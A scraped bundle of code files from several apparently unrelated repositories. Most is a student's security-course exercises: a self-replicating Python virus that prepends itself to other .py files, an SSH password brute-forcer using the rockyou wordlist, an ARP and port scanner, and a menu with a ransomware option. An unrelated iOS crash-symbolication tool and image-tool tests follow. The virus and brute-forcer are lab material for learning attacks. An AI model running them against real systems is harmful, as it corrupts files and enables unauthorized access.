userInput = input("What would like to add? ")
return userInput
# Main
## Print the fourth element of the list.
getElement(3,4)
## Print the sixth through tenth element of the list.
getElement(5,9)
## Change the value of the seventh element to "onion".
changeElement(6, "onion")
getElement(6,7)
### STRETCH GOAL
cities.append(askUser())
print(f"This is whats in the array: {cities}")
cities.clear()
print(f"This is whats in the array after clear(): {cities}")
cities = pokemon.copy()
print(f"This is whats in the array after clear(): {cities}")
# End
```
#### File: OPS301/ops-challenge/ops-challenge11.py
```python
from os import remove
# Script Name: Ops Challenge: Class 11
# Author: <NAME>
# Date of last revision: 09/14/2020
# Description of purpose: Able to perform file manipulation
# Declare the variables
## File path to the text file
filePath = "./jedi.txt"
# Declare the functions
## Writing into the file
def writeFile(file):
file1 = open(file, "w")
file1.writelines("May\n")
file1.writelines("the\n")
file1.writelines("force be with you")
file1.close()
## reading the file
def readFile(file):
file1 = open(file, "r")
print(file1.readlines()[0])
file1.close()
## Erase the File
def removeFile(file):
remove(file)
print("file is gone")
# Main
writeFile(filePath)
readFile(filePath)
removeFile(filePath)
# END
```
#### File: OPS301/ops-challenge/ops-challenge13.py
```python
from requests import get, post, put, delete, head, patch, options, auth
## library utilized to get current user's username
import getpass
import os
import time
# Script Name: Ops Challenge: Class 13
# Author: <NAME>
# Date of last revision: 09/16/2020
# Description of purpose: To perform HTTP protocols through user's input. Every input from user will determine the final outcome.
# Declaring variable
requestArr = ["GET", "POST", "PUT", "DELETE", "HEAD", "PATCH", "OPTIONS"]
# Declaring function
## Main interface with error handling
def mainMenu():
try:
count = 1
print(f"Hi {getpass.getuser()}! What do you want to perform?")
for r in requestArr:
print(f"{str(count)}. {r}")
count += 1
userChoice = input("Choice --> ")
if(int(userChoice) > 6):
raise ValueError
userChoice = int(userChoice) - 1
requestMethod(requestArr[userChoice])
except ValueError:
print("You entered wrong choice!!")
exit(0)
## request method (refactored)
def requestMethod(method):
if(validateChoice(method)):
response = eval(str.lower(method))(url)
statCode = int(response.status_code)
statusCodes(statCode)
# Final out put after running the query to the given URL
def statusCodes(statCode):
timeOut()
if (statCode >= 100 and statCode < 200):
print(colors.fg.orange,f"{getpass.getuser()}, you got informational querying response from {url}")
elif (statCode >= 200 and statCode < 300):
print(colors.fg.green,f"{getpass.getuser()}, your response came back querying successful from {url}")
elif (statCode >= 300 and statCode < 400):
print(colors.fg.orange,f"{getpass.getuser()}, you were redirected querying from {url}")
elif (statCode >= 400 and statCode < 500):
print(colors.fg.red,f"{getpass.getuser()}, you done mess up querying from {url}")
else:
print(colors.fg.red,f"{getpass.getuser()}, Server had error to your request from {url}")
print(colors.reset)
## Validating if the choice was yes
def validateChoice(choice):
userOption = input(f"You chose to perform {choice} method to {url}. Do you want to proceed (y)es/(n)o? ")
if(userOption == "y" or userOption == "yes" or userOption == "Y" or userOption == "Yes"):
return True
else:
return False
## what site does user want to query
def whatSite():
url = input("which site do you want to request? ")
while (len(url) < 3):
print(colors.fg.red,"You entered wrong url", colors.reset)
url = input("which site do you want to request? ")
if(url.__contains__("https") == False):
url = f"https://{url}"
return url
### HELPER FUNCTION
## class that contains default color that can be used for console
class colors:
reset='\033[0m'
class fg:
green='\033[32m'
red='\033[0;31m'
orange = '\033[33m'
## timeout to give user a realistic experience
def timeOut():
print("Querying.....")
time.sleep(2)
#checking if its int parsable
def checkParsable(num):
try:
int(s)
return True
except ValueError:
return False
### STRETCH GOAL
## Calling authentication to the GitHub api
def authentication():
username = input("Type your username: ")
password= input("Type your password: ")
response = get(f"https://api.github.com/user, ",
auth = auth.HTTPBasicAuth(username, password))
print(response.status_code)
# MAIN
url = whatSite()
mainMenu()
authentication()
exit(0)
# END
```
#### File: OPS301/ops-challenge/ops-challenge14.py
```python
import os
import datetime
# assigning string virus to the variable
SIGNATURE = "VIRUS"
# This is a function to output an array. It inserts files that hasn't had word, virus, in the python file and append
# it to the array
def locate(path):
# creating an empty list, array
files_targeted = []
# listing the directory from that path argument that this function is taking in and assigning that to filelist
filelist = os.listdir(path)
# running a for loop to access files/folders in the directory path
for fname in filelist:
# if the specified path is an existing directory it will return boolean true otherwise false
if os.path.isdir(path+"/"+fname):
# hitting true from previous if logic, follwing statement will recurse the locate function again
# and seeing if there is more folder in this directory
files_targeted.extend((locatepath+"/"+fname))
# if the file's third index from the back is python file it will enter into this if logic
elif fname[-3:] == ".py":
# this sets infected variable as false
infected = False
# running for loop iteration to print out line by line
for line in open(path+"/"+fname):
# if the line in the python file contains word, virus, then it will set variable to true and
# break out of this for loop
if SIGNATURE in line:
infected = True
break
# if previous if logic never hit, then the python file didn't contain virus so infected will be still
# set to be false, hence it will hit this logic and put the file into the files_targeted array
if infected == False:
files_targeted.append(path+"/"+fname)
# returning the array at the end
return files_targeted
# this function is designed to override python files that doesn't have virus string and concatenating the virus file with current files content.
def infect(files_targeted):
#this prints prints absolute path to the given file
virus = open(os.path.abspath(__file__))
#declaring a variable call virusstring and attach it with empty string
virusstring = ""
#running the for loop to access the file and output each line in that file
for i,line in enumerate(virus):
# if the i is greather than or equal 0 and i is less than 39 then this if logic will hit
if i>=0 and i <39:
# storing each lines within line 0 to line 39 of string into the `virusstring` variable
virusstring += line
# closing the open file from the memory
virus.close
# running a for loop to access the filename withtin the files_targeted array
for fname in files_targeted:
# declaring a variable call f and assigning the open file in the files_targeted array to the variable f
f = open(fname)
# declaring a variable and assigning all of the lines within the file to the variable.
temp = f.read()
# closing the f file from the memory
f.close()
# opening file this time with writing modifier, and override the fname file.
f = open(fname,"w")
# writing the long texts of string thats previously stored from virusstring and concatenate that to the temp variable that has all of the lines from f file.
f.write(virusstring + temp)
# closing the file from the memory
f.close()
# this function to validate current date with may 9th and if its, then print out the fact that user has been hacked.
def detonate():
# if the current date is may may 9th then execute following code block
if datetime.datetime.now().month == 5 and datetime.datetime.now().day == 9:
# printing to the terminal that you have been hacked.
print "You have been hacked"
# these are where all of the function will be invoked and executed.
## this variable is storing the list that had outputted from locate function call
files_targeted = locate(os.path.abspath(""))
# to call the infect function with output array that is resulted from locate function
infect(files_targeted)
# to invoke function detonate to print out to the user that they been hacked if the today's date is May 5th.
detonate()
## Stretch Goal
# The functions above are utilizing the os library to do the operation. For locate function, it is using listdir, and isdir in the os library. This is a function in os that outputs boolean if there is such director is available. It also utilize listdir which will print out list of files/folder in the given path. Other functions that was used in that function are array builtin function such adding item to the list or extending the list.
# infected also uses os library as well. First it ulitize path.abspath which give absolute path of given file in the parameter. Another builtin python function it utilizes was open operation. `Open` is used to open the file and using that to read or write the file.
# This is malware that overrides the python file with string of texts. With given text that attacker feeds and original content in the the python file, it overrides the file and put all of them in same categories.
# I think this is a well written code in that it does what attacker intended to do. However, some of the functions fulfills multiple things which can be refactored. A function should do one job and do great at it, where infect and locate function seems to be overloaded with multiple functionality.
``` |
{
"source": "jinwoov/Ops401",
"score": 3
} |
#### File: ops_challenge05/classes/helper_method.py
```python
import time, progressbar, os
def animated_marker():
widgets = ['In Process: ', progressbar.AnimatedMarker()]
bar = progressbar.ProgressBar(widgets=widgets).start()
for i in range(17):
time.sleep(0.1)
bar.update(i)
print ("\033[A \033[A")
print("Finished!")
class colors:
reset='\033[0m'
class fg:
magenta='\033[35m'
green='\033[32m'
red='\033[0;31m'
orange = '\033[33m'
```
#### File: ops_challenge/ops_challenge05/main.py
```python
from classes.key import *
from classes.helper_method import *
from classes.userChoice import *
from classes.malware import *
## interface screen
def interface(key):
print(f"""
______ _ _ _
| ____| | | (_) | |
| |__ _ __ ___ _ __ _ _ _ __ | |_ _ _ __ __ _| |_ ___ _ __
| __| | '_ \ / __| '__| | | | '_ \| __| | '_ \ / _' | __/ _ \| '__|
| |____| | | | (__| | | |_| | |_) | |_| | | | | (_| | || (_) | |
|______|_| |_|\___|_| \__, | .__/ \__|_|_| |_|\__,_|\__\___/|_|
__/ | |
|___/|_|
{colors.fg.orange} by <NAME>{colors.reset}
1) Encrypt File
2) Decrypt File
3) Encrypt a Message
4) Decrypt a Message
5) Encrypt the current folder
6) Decrypt the current folder
{colors.fg.red}7) Initiate RANSOMEWARE{colors.reset}
8) Exit
""")
userChoice = input("Choice ? ")
if(userChoice == "8" or userChoice == None):
print(colors.fg.green, "Thanks for playing", colors.reset)
exit(0)
choiceMenu(userChoice,key)
## Create a main function to execute following functions
def main():
keyring = Key()
interface(keyring.gkey)
# MAIN
if __name__ == "__main__":
while True:
main()
# END
```
#### File: ops-challenge13/classes/arps.py
```python
import scapy.all as s
from .scanner import *
## Class to contain all of the arp properties and methods.
class Arps:
## properties when the object is instantiated
def __init__(self):
self.subnet = self.askWhatGateWay()
self.list_IP = list()
## arpy function that will make ARP scan and get the IP that is responsive
def arpy(self):
arp = s.ARP(pdst=self.subnet)
bcast = "ff:ff:ff:ff:ff:ff"
broadcast = s.Ether(dst=bcast)
request_broadcast = broadcast / arp
clients = s.srp(request_broadcast, timeout =3)[0]
for element in clients:
self.list_IP.append(element[1].psrc)
print(element[1].psrc + " " + element[1].hwsrc)
input("Please enter any key to scan for available IP")
self.checkPorts(self.list_IP)
input("Please enter any key to continue")
## Checking for the ports
def checkPorts(self, ip_adds):
dst_port = [21, 22, 80, 443]
for ip in ip_adds:
testing_vulnerability(str(ip), dst_port)
## Asking user for what subnets
def askWhatGateWay(self):
return input("what subnet do you want to ARP? ")
```
#### File: ops-challenge17/classes/ssh.py
```python
import paramiko
from time import sleep
import os
class AuthSSH():
def __init__(self):
self.IP = self.get_IP()
self.user_name = self.userInfo()
def get_IP(self):
getIP = input("What ip do you want to shell into? ")
while(getIP == "" or getIP == None):
getIP = input("Please put legit IP ")
return getIP
def userInfo(self):
getUN = input("what is the username? ")
while(getUN == "" or getUN == None):
getUN = input("Please put legit username ")
return getUN
def ssh_connection(self):
# client = paramiko.Transport((self.IP, 22))
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.crackPW(client)
def crackPW(self,client):
textFile = os.path.abspath("./rockyou.txt")
file = open(textFile, "r")
readfile = file.read().splitlines()
print(self.user_name)
for line in readfile:
print(line)
try:
client.connect(hostname=self.IP, username=self.user_name, password=str(line), port= 22)
print(f"Login was successful to {self.IP} using {str(line)}, you are now in")
break
except:
print("Login failed :(")
sleep(.5)
continue
stdin, stdout, stderr = client.exec_command("ping -c 3 8.8.8.8")
print(stdout.read().splitlines())
client.close()
return
```
#### File: ops-challenge26/classess/loggin.py
```python
import logging,os
class OneLineExceptionFormatter(logging.Formatter):
def formatException(self, exc_info):
return super().formatException(exc_info)
def format(self, record):
result = super().format(record)
if record.exc_text:
result = result.replace("\n", "")
return result
root = logging.getLogger()
logging.basicConfig(filename="./error.log", level=logging.DEBUG, format='%(asctime)s:%(levelname)s:%(message)s')
logging.debug("Debug Information")
logging.info("Info information")
logging.warning("Warning information")
logging.error("Error information")
logging.critical("Critical information")
# formatter = OneLineExceptionFormatter(logging.BASIC_FORMAT)
# fh = logging.FileHandler("./error.log")
# fh.setLevel(os.environ.get("LOGLEVEL", "INFO"))
# fh.setFormatter(formatter)
# root.addHandler(fh)
```
#### File: ops_challenge/ops-challenge45/main.py
```python
from classes.port_scanner import *
from classes.banner_grab import *
from classes.nmap_scan import *
def interface():
print("""
1) Banner Grabber
2) Port Scanner
3) NMAP Scanner
4) Exit
""")
user_input = input("Choice?..... ")
try:
dictionary[user_input]()
except Exception as msg:
print(colors.fg.red, msg, colors.reset)
pass
dictionary = {
"1": main_banner,
"2": main_port,
"3": nmap_interface,
"4": exit
}
while True:
interface()
```
#### File: ops-challenges27/classes/rotating_log.py
```python
import logging
import time
from logging.handlers import RotatingFileHandler
from logging.handlers import TimedRotatingFileHandler
## rotating logs
def rotating_log(filePath, size):
logger = logging.getLogger("Rotaing log")
logger.setLevel(logging.INFO)
handler = RotatingFileHandler(filePath, maxBytes=int(size), backupCount=5)
userBlah = input("what message do you want?")
logger.addHandler(handler)
for i in range(20):
logger.info(f"{userBlah} %s" % i)
time.sleep(1.5)
```
#### File: ops-challenges27/classes/rotating_time.py
```python
import logging
import time
from logging.handlers import TimedRotatingFileHandler
## this is to track the time
def rotating_time(filePath):
logger = logging.getLogger("Rotating log")
logger.setLevel(logging.INFO)
timer = user_choice()
# this is going to track it when the minute is over while logging. due to when="w"
handler = TimedRotatingFileHandler(filePath,
when =timer,
interval=1,
backupCount=5)
logger.addHandler(handler)
for i in range(6):
logger.info("this is test log line")
time.sleep(60)
def user_choice():
print("""
How often do you want to change log files?
1. Seconds
2. Minutes
3. Hours
4. Days
""")
userT = input()
if(userT == "1"):
return "s"
elif(userT == "2"):
return "m"
elif(userT == "3"):
return "h"
else:
return "d"
```
#### File: ops_challenge/ops-challenges31/main.py
```python
import sys
from classes.search import *
## Declare functions
def interface():
# operSys = sys.platform
# if operSys.lower().__contains__("win"):
# search_windows()
# # else:
# # search_linux()
search_file()
exit(0)
## Main
def main():
interface()
if __name__ == "__main__":
main()
## END
```
#### File: ops-challenges33/classes/search.py
```python
import subprocess, os
from time import sleep
from .colors import *
# Declare variables
# querying the functions to check if the file exists.
def search_file():
try:
# prompting user with different option
user_file = input("What file name do you want to search? ")
dir_location = input("What directory do you want to search in? ")
path_way = os.path.abspath(dir_location)
# Printing out to check with the user if they are satisfied with their answer
print(colors.fg.green, path_way , f"File Name: {user_file}", colors.reset)
user_choice = input("Is this where and what you want to search? (y/n) ")
# while loop to check if the answer was y if not it will run continuous loop to get yes as a output.
while (user_choice != "y"):
dir_location = input("What directory do you want to search in? ")
path_way = os.path.abspath(dir_location)
print(colors.fg.green, path_way , f"File Name: {user_file}", colors.reset)
user_choice = input("Is this where and what you want to search? (y/n) ")
counter = output_search(user_file, path_way)
if(counter == 0):
print(colors.fg.red, "No result found", colors.reset)
else:
print(colors.fg.green, f"{counter} out of {total_files} files were matched", colors.reset)
input("Search complete")
except Exception as msg:
print(msg)
exit(1)
# universal file finder
def output_search(sf, pt):
count = 0
global total_files
total_files = 0
for root, dirs, files in os.walk(pt):
for file in files:
if(file.lower().__contains__(sf)):
print(os.path.join(root, file))
sleep(1.5)
count += 1
total_files += 1
return count
```
#### File: ops_challenge/ops-challenges37/main.py
```python
from classes.banner_grab import *
from classes.cookies import *
from time import sleep
## Declare Function
def interface():
try:
bringforthcookiemonster()
print("""
1) Banner Grabbing
2) Cookie Capture
3) XSS Vulnerability Detection
4) Exit
""")
user_answer = input("Whats your choice... ")
if (user_answer == "1"):
banner_grabbing()
elif (user_answer == "2"):
get_html()
elif (user_answer == "3"):
xss_detection()
else:
print("exiting.... ")
sleep(1.5)
exit(0)
except Exception as msg:
print(msg)
exit(1)
## Main
if __name__ == "__main__":
interface()
## End
``` |
{
"source": "JinWuZhao/symbolicatedcrash",
"score": 2
} |
#### File: symbolicatedcrash/symbolicate/symbolicate.py
```python
from logutils import *
import re
from subprocess import getstatusoutput
import os
__author__ = 'jinzhao'
def version():
return '1.0.0'
def symbolicate_crash(crash_log, finder_func, output_path=None, verbose_mode=False):
"""
符号化crash日志
:param crash_log:crash日志文件路径
:param finder_func:查询app符号文件的处理函数,定义为:(name:string, identifier:string, version:string, codetype:string, uuid:string) -> (path)
:param output_path:符号化之后的crash文件路径,默认为none,表示直接输出到stdin
:param verbos_mode:是否开启调试模式
:return 是否成功
"""
if verbose_mode is False:
global loge
global logd
global logi
loge = lambda x : x
logd = lambda x : x
logi = lambda x : x
status, lines = _read_log(crash_log)
if status is False:
loge('cannot open log file "{log_file}"'.format(log_file=crash_log))
return False
crash_list = _parse_content(lines, finder_func)
logd('there is %d crash obj' % len(crash_list))
crash_list = map(lambda obj: _symbolicate_stack_items(obj), crash_list)
newlines = _compose_log(crash_list, lines)
if output_path is None:
for line in newlines:
print(line.rstrip('\n'))
else:
if _write_log(output_path, newlines) is False:
loge('cannot write into file "{log_file}"'.format(log_file=output_path))
return False
return True
def query_uuid(code_type, symbol_file):
"""
符号文件uuid查询
:param codetype: cpu架构版本
:param symbol_file: 符号文件路径
:return uuid
"""
uuid_re_obj = re.compile(_match_dwarfdump_uuid_re())
logd('dwarfdump --uuid --arch {code_type} {symbol_file}'.format(code_type=code_type, symbol_file=symbol_file))
status, output = getstatusoutput('dwarfdump --uuid --arch {code_type} {symbol_file}'.format(code_type=code_type, symbol_file=symbol_file))
output_uuid = ''
uuid_match_obj = uuid_re_obj.match(output)
if uuid_match_obj is not None:
output_uuid = ''.join(uuid_match_obj.groups())
else:
loge('cannot parse the output of dwarfdump')
return output_uuid
def _match_crash_header_re():
"""
匹配Incident Identifier: xxxxxx-xxxx-xxxx-xxxx-xxxxxx等文字
"""
return r'^Incident\sIdentifier:\s*[A-F0-9\-]+\s*$'
def _match_product_name_re():
"""
匹配应用进程名称
"""
return r'^Process:\s*([\S.]+)\s\[\d+\]\s*$'
def _match_identifier_re():
"""
匹配BundleId
"""
return r'^Identifier:\s*([a-zA-Z0-9_\-\.]+)\s*$'
def _match_version_re():
"""
匹配应用版本号
"""
return r'^Version:\s*([\d\.]+)\s*$'
def _match_code_type_re():
"""
匹配codetype
"""
return r'^Code\sType:\s*([a-zA-Z0-9\-]+)\s*$'
def _match_os_version_re():
"""
匹配系统版本
"""
return r'^OS\sVersion:\s*i[^0-9]+(.+)\s*$'
def _match_stack_item_re():
"""
匹配崩溃栈信息
"""
return r'^\d+\s+([a-zA-Z0-9\-_\+\.]+)\s+(0x[a-f0-9]+)\s(0x[a-f0-9]+)\s\+\s\d+\s*$'
def _sub_stack_item_symbol_re():
"""
匹配崩溃栈中load_address以后的部分用于替换为符号部分
"""
return r'0x[a-f0-9]+\s\+\s[\d]+'
def _match_image_item_re():
"""
匹配image信息
"""
return r'^\s*(0x[a-f0-9]+)\s\-\s+0x[a-f0-9]+\s+([a-zA-Z0-9\-_\+\.]+)\s+([a-z0-9]+)\s+(<([a-f0-9]+)>\s)?([\S.]+)\s*$'
def _match_stack_header_re():
"""
匹配崩溃栈信息头
"""
return r'^Last\sException\sBacktrace:\s*$|^Thread\s0\sCrashed:\s*$|^Thread\s0:\s*$'
def _match_image_header_re():
"""
匹配image信息头
"""
return r'^Binary\sImages:\s*$'
def _sub_proccess_file_path_re():
"""
处理文件路径中shell不支持的空白字符和括号字符,添加转义
"""
return r'([\\]?[\s\(\)])'
def _match_dwarfdump_uuid_re():
"""
匹配dwarfdump输出的uuid部分
"""
return r'^UUID:\s([A-F0-9]+)\-([A-F0-9]+)\-([A-F0-9]+)\-([A-F0-9]+)\-([A-F0-9]+)\s\([a-z0-9]+\)\s.+$'
def _os_symbol_file_path_prefix():
"""
iOS系统相关符号文件路径前缀
"""
return '~/Library/Developer/Xcode/iOS DeviceSupport'
class CrashInfo(object):
"""
crash数据结构
"""
def __init__(self):
self.__product_name = None
self.__identifier = None
self.__version = None
self.__code_type = None
self.__os_version = None
self.__function_stacks = None
self.__binary_images = None
@property
def product_name(self):
if self.__product_name is None:
self.__product_name = ''
return self.__product_name
@product_name.setter
def product_name(self, value):
self.__product_name = value
@property
def identifier(self):
if self.__identifier is None:
self.__identifier = ''
return self.__identifier
@identifier.setter
def identifier(self, value):
self.__identifier = value
@property
def version(self):
if self.__version is None:
self.__version = ''
return self.__version
@version.setter
def version(self, value):
self.__version = value
@property
def code_type(self):
if self.__code_type is None:
self.__code_type = ''
return self.__code_type
@code_type.setter
def code_type(self, value):
self.__code_type = value
@property
def os_version(self):
if self.__os_version is None:
self.__os_version = ''
return self.__os_version
@os_version.setter
def os_version(self, value):
self.__os_version = value
@property
def function_stacks(self):
if self.__function_stacks is None:
self.__function_stacks = list()
return self.__function_stacks
@property
def binary_images(self):
if self.__binary_images is None:
self.__binary_images = dict()
return self.__binary_images
class StackItemInfo(object):
"""
栈信息结构
"""
def __init__(self):
self.__line_num = None
self.__name = None
self.__invoke_address = None
self.__load_address = None
self.__invoke_symbol = None
@property
def line_num(self):
if self.__line_num is None:
self.__line_num = -1
return self.__line_num
@line_num.setter
def line_num(self, value):
self.__line_num = value
@property
def name(self):
if self.__name is None:
self.__name = ''
return self.__name
@name.setter
def name(self, value):
self.__name = value
@property
def invoke_address(self):
if self.__invoke_address is None:
self.__invoke_address = ''
return self.__invoke_address
@invoke_address.setter
def invoke_address(self, value):
self.__invoke_address = value
@property
def load_address(self):
if self.__load_address is None:
self.__load_address = ''
return self.__load_address
@load_address.setter
def load_address(self, value):
self.__load_address = value
@property
def invoke_symbol(self):
if self.__invoke_symbol is None:
self.__invoke_symbol = ''
return self.__invoke_symbol
@invoke_symbol.setter
def invoke_symbol(self, value):
self.__invoke_symbol = value
class ImageItemInfo(object):
"""
Image信息结构
"""
def __init__(self):
self.__load_address = None
self.__name = None
self.__code_type = None
self.__uuid = None
self.__symbol_file = None
@property
def load_address(self):
if self.__load_address is None:
self.__load_address = ''
return self.__load_address
@load_address.setter
def load_address(self, value):
self.__load_address = value
@property
def name(self):
if self.__name is None:
self.__name = ''
return self.__name
@name.setter
def name(self, value):
self.__name = value
@property
def code_type(self):
if self.__code_type is None:
self.__code_type = ''
return self.__code_type
@code_type.setter
def code_type(self, value):
self.__code_type = value
@property
def uuid(self):
if self.__uuid is None:
self.__uuid = ''
return self.__uuid
@uuid.setter
def uuid(self, value):
self.__uuid = value
@property
def symbol_file(self):
if self.__symbol_file is None:
self.__symbol_file = ''
return self.__symbol_file
@symbol_file.setter
def symbol_file(self, value):
self.__symbol_file = value
def _read_log(path):
"""
:param path: log file path
:return status:Bool, lines:List
"""
lines = list()
try:
with open(path, 'r') as file:
logi('open file {log_path} for reading'.format(log_path=path))
lines = file.readlines()
except Exception as e:
loge(e)
return (False, list())
return (True, lines)
def _write_log(path, lines):
"""
:param path: log file path
:param lines: content
:return status:Bool
"""
try:
with open(path, 'w') as file:
logi('open file {log_path} for writting'.format(log_path=path))
file.writelines(lines)
except Exception as e:
loge(e)
return False
return True
def _parse_content(lines, finder_func):
"""
:param lines: content
:param finder_func: (name:String, identifier:String, version:String, codetype:String, uuid:String) -> (path)
:return crash_list: list of CrashInfo
"""
header_part_complete = False
stack_info_complete = False
image_info_complete = False
crash_list = list()
re_obj = None
crash_obj = None
for index, line in enumerate(lines):
#logd('line %d: %s' % (index, line))
if header_part_complete is False:
crash_obj, header_part_complete = _parse_crash_info(line, crash_obj)
#logd('parse crash info complete: ' + str(header_part_complete))
elif stack_info_complete is False:
crash_obj, re_obj, stack_info_complete = _parse_stack_info(line, re_obj, crash_obj, index)
#logd('parse stack info complete: ' + str(stack_info_complete))
elif image_info_complete is False:
crash_obj, re_obj, image_info_complete = _parse_image_info(line, re_obj, crash_obj)
#logd('parse image info complete: ' + str(image_info_complete))
else:
crash_obj.binary_images[crash_obj.product_name].symbol_file = finder_func(crash_obj.product_name, crash_obj.identifier, crash_obj.version, crash_obj.binary_images[crash_obj.product_name].code_type, crash_obj.binary_images[crash_obj.product_name].uuid)
crash_list.append(crash_obj)
#logd('store crash obj')
header_part_complete = False
stack_info_complete = False
image_info_complete = False
crash_obj = None
return crash_list
def _parse_crash_info(line, crash_obj):
"""
:param line: line string
:param crash_obj: CrashInfo object
:return: crash_obj, complete:Bool
"""
complete = False
if crash_obj is None:
if re.match(_match_crash_header_re(), line) is not None:
crash_obj = CrashInfo()
elif len(crash_obj.product_name) == 0 :
match_obj = re.match(_match_product_name_re(), line)
if match_obj is not None:
crash_obj.product_name = match_obj.group(1)
elif len(crash_obj.identifier) == 0:
match_obj = re.match(_match_identifier_re(), line)
if match_obj is not None:
crash_obj.identifier = match_obj.group(1)
elif len(crash_obj.version) == 0:
match_obj = re.match(_match_version_re(), line)
if match_obj is not None:
crash_obj.version = match_obj.group(1)
elif len(crash_obj.code_type) == 0:
match_obj = re.match(_match_code_type_re(), line)
if match_obj is not None:
crash_obj.code_type = match_obj.group(1)
elif len(crash_obj.os_version) == 0:
match_obj = re.match(_match_os_version_re(), line)
if match_obj is not None:
crash_obj.os_version = match_obj.group(1)
complete = True
return (crash_obj, complete)
def _parse_stack_info(line, re_obj, crash_obj, line_num):
"""
:param line: line string
:param re_obj: re compiled object
:param crash_obj: CrashInfo object
:return: crash_obj, re_obj, complete:Bool
"""
if re_obj is None:
re_obj = re.compile(_match_stack_item_re())
complete = False
match_obj = re_obj.match(line)
if match_obj is not None:
stack_item = StackItemInfo()
stack_item.name = match_obj.group(1)
stack_item.invoke_address = match_obj.group(2)
stack_item.load_address = match_obj.group(3)
stack_item.line_num = line_num
crash_obj.function_stacks.append(stack_item)
elif re.match(_match_image_header_re(), line) is not None:
complete = True
re_obj = None
return (crash_obj, re_obj, complete)
def _parse_image_info(line, re_obj, crash_obj):
"""
:param line: line string
:param re_obj: re compiled object
:param crash_obj: CrashInfo object
:return: crash_obj, re_obj, complete:Bool
"""
if re_obj is None:
re_obj = re.compile(_match_image_item_re())
complete = False
match_obj = re_obj.match(line)
if match_obj is not None:
image_item = ImageItemInfo()
image_item.load_address = match_obj.group(1)
image_item.name = match_obj.group(2).lstrip('+')
image_item.code_type = match_obj.group(3)
image_item.uuid = match_obj.group(5)
if image_item.uuid is not None:
image_item.uuid = image_item.uuid.upper()
image_item.symbol_file = '{prefix}/{os_version}/Symbols/{symbol_file}'\
''.format(prefix=_os_symbol_file_path_prefix(),
os_version=crash_obj.os_version,
symbol_file=match_obj.group(6).lstrip('/'))
crash_obj.binary_images[image_item.name] = image_item
elif len(crash_obj.binary_images.items()) > 0:
complete = True
re_obj = None
return (crash_obj, re_obj, complete)
def _symbolicate_stack_items(crash_obj):
"""
:param crash_obj: CrashInfo object
:return: crash_obj
"""
re_obj = re.compile(_sub_proccess_file_path_re())
uuid_re_obj = re.compile(_match_dwarfdump_uuid_re())
def proccess_path(match_obj):
matched_str = match_obj.group(1)
if len(matched_str) > 0 and matched_str[0] != '\\':
return '\\'+matched_str
return matched_str
def run_atos(stack_item, image_item, symbol_file_path):
logd('atos -arch {code_type} -o {symbol_file} -l {load_address} {invoke_address}'.format(code_type=image_item.code_type, symbol_file=symbol_file_path, load_address=stack_item.load_address, invoke_address=stack_item.invoke_address))
status, output = getstatusoutput('atos -arch {code_type} -o {symbol_file} -l {load_address} {invoke_address}'.format(code_type=image_item.code_type, symbol_file=symbol_file_path, load_address=stack_item.load_address, invoke_address=stack_item.invoke_address))
if status == 0:
stack_item.invoke_symbol = output
else:
loge(output)
for stack_item in crash_obj.function_stacks:
image_item = crash_obj.binary_images.get(stack_item.name)
if image_item is None:
continue
symbol_file_path = re_obj.sub(proccess_path, image_item.symbol_file)
if image_item.uuid is not None and len(image_item.uuid) > 0:
logd('dwarfdump --uuid --arch {code_type} {symbol_file}'.format(code_type=image_item.code_type, symbol_file=symbol_file_path))
status, output = getstatusoutput('dwarfdump --uuid --arch {code_type} {symbol_file}'.format(code_type=image_item.code_type, symbol_file=symbol_file_path))
output_uuid = output
uuid_match_obj = uuid_re_obj.match(output)
if uuid_match_obj is not None:
output_uuid = ''.join(uuid_match_obj.groups())
else:
loge('cannot parse the output of dwarfdump')
if status == 0 and output_uuid == image_item.uuid:
run_atos(stack_item, image_item, symbol_file_path)
else:
loge('warnning! symbol file "{symbol_file}": uuid is not matched {uuid}'.format(symbol_file=symbol_file_path, uuid=image_item.uuid))
loge(output)
else:
run_atos(stack_item, image_item, symbol_file_path)
return crash_obj
def _compose_log(crash_list, lines):
"""
:param crash_list: CrashInfo list
:param lines: origin log content
:return: new log content
"""
re_obj = re.compile(_sub_stack_item_symbol_re())
for crash_obj in crash_list:
for stack_item in crash_obj.function_stacks:
lines[stack_item.line_num] = re_obj.sub(stack_item.invoke_symbol, lines[stack_item.line_num])
return lines
``` |
{
"source": "jinwyp/image-background-remove-tool",
"score": 2
} |
#### File: image-background-remove-tool/tests/test_gen.py
```python
import unittest
from libs import strings
from main import process
import multiprocessing
import os
def run(test, i, o, m, prep, postp):
try:
process(i, o, m, prep, postp)
except BaseException as e:
test.fail("TESTING FAILED!\n"
"PARAMS:\n"
"model_name: {}\n"
"input_path: {}\n"
"output_path: {}\n"
"preprocessing_method: {}\n"
"postprocessing_method: {}\n"
"Error: {}\n".format(m, i, o, prep, postp, str(e)))
exit(1)
exit(0)
def gen(test):
for model_name in strings.MODELS_NAMES:
for preprocess_method_name in strings.PREPROCESS_METHODS:
for postprocess_method_name in strings.POSTPROCESS_METHODS:
if not os.path.exists("docs/imgs/examples/{}/{}/{}".format(model_name,
preprocess_method_name,
postprocess_method_name)):
os.makedirs("docs/imgs/examples/{}/{}/{}".format(model_name,
preprocess_method_name, postprocess_method_name),
exist_ok=True)
print(model_name, preprocess_method_name, postprocess_method_name)
proc = multiprocessing.Process(target=run,
args=(test, "docs/imgs/input/",
"docs/imgs/examples/{}/{}/{}".format(model_name,
preprocess_method_name,
postprocess_method_name),
model_name, preprocess_method_name, postprocess_method_name,))
proc.start()
proc.join()
if proc.exitcode == 1:
return False
return True
class GenTest(unittest.TestCase):
def test_generator(self):
self.assertEqual(gen(self), True)
if __name__ == '__main__':
unittest.main()
```
#### File: image-background-remove-tool/tests/test_save.py
```python
from main import __save_image_file__
import os
import shutil
import unittest
import random
from PIL import Image
def new_name():
filename = str(random.randint(0, 1202)) + ".jpg"
return filename
def save():
path = "tests/tests_temp/save_test/"
if not os.path.exists(path):
os.makedirs(path, exist_ok=True)
__save_image_file__(Image.new("RGBA", (256, 256), color=0), new_name(), path, "dir") # Dir mode
__save_image_file__(Image.new("RGBA", (256, 256), color=0), new_name(), path, "file") # File name empty base name
a = None
f = new_name()
try:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f, "file") # Extension Exception
except OSError:
a = True
if a:
a = False
try:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f, "dir") # Not dir error
except OSError as e:
a = True
if a:
__save_image_file__(Image.new("RGBA", (256, 256), color=0), f, path + f + '.png',
"file") # filename png test
else:
return False
